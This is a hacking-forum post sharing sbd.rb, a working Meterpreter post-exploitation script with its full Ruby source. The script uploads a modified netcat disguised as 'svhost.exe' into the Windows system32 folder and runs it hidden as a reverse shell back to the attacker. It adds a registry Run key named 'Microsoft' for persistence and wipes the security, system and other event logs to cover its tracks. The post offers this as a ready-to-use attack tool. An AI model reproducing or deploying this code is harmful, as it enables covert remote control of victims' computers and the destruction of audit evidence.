Jump to content
Gonzalez

sbd.rb

By Gonzalez, in Programare

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted

sbd.rb uploads sbd.exe runs as svchost.exe with the settings that are entered ny attacker

it autoruns via registry & autostarts as the script is run then clears system logs remeber it is a modded netcat for a reverse shell needs some more edits to script to hide the reg a little better but this will do till update time

session = client
host,port = session.tunnel_peer.split(':')
#Menu-Options
@@exec_opts = Rex::Parser::Arguments.new(
    "-r" => [ true,  "Resporn time limit." ],
    "-p" => [ true,  "Port Number to open." ],
    "-k" => [ true,  "Authentication name."],
    "-h" => [ true,  "Local ip address."]
)  
def usage
    print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
    print_line("   Michael Johnson  (Zero Cold)  mjog123@hotmail.com   ")
    print_line("####################################################")
    print(@@exec_opts.usage)
    raise Rex::Script::Completed
end

#Files to upload to target host
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
#Function to upload files
def upload(session,file)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    fileontrgt = "#{location}\\#{"svhost"}.exe"
    print_status("Uploading #{file}....")
    session.fs.file.upload_file("#{fileontrgt}","#{file}")
    print_status("#{file} Uploaded!")
    return fileontrgt
end

#Function to execute sbd
def sbdrun(session,time,auth,port,ip)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Local Ip  Sbd Will Connect Back On: #{ip}")
    print_status("Local Port Sbd Will Connect Back On: #{port}")
    print_status("Pass Phrase: #{auth}")
    print_status("Respawn Time: #{time}")
end
#Fuction to add registry for sbd
def regadd(session,time,auth,port,ip)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    print_status("Adding to Registry ...")
    session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
     print_status("Successfully added to Registry  ...")
end
def clrevtlgs(session)
    evtlogs = [
        'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
    ]

    begin
        evtlogs.each do |evl|
            log = session.sys.eventlog.open(evl)
            log.clear
        end
    rescue ::Exception => e
        print_status("Error clearing Event Log: #{e.class} #{e}")

    end
end

#Menu-Imput
time  = nil
port = nil
ip   = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
    case opt
        when "-r"
            time  = val
        when "-p"
            port = val
        when "-h"
              ip = val
        when "-k"
            auth = val 
        end

}
if port

upload(session,ncexe)
sbdrun(session,time,auth,port,ip)
regadd(session,time,auth,port,ip)
clrevtlgs(session)
else
    usage
end

Video:

http://www.youtube.com/watch?v=imFAm3AxOuc

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...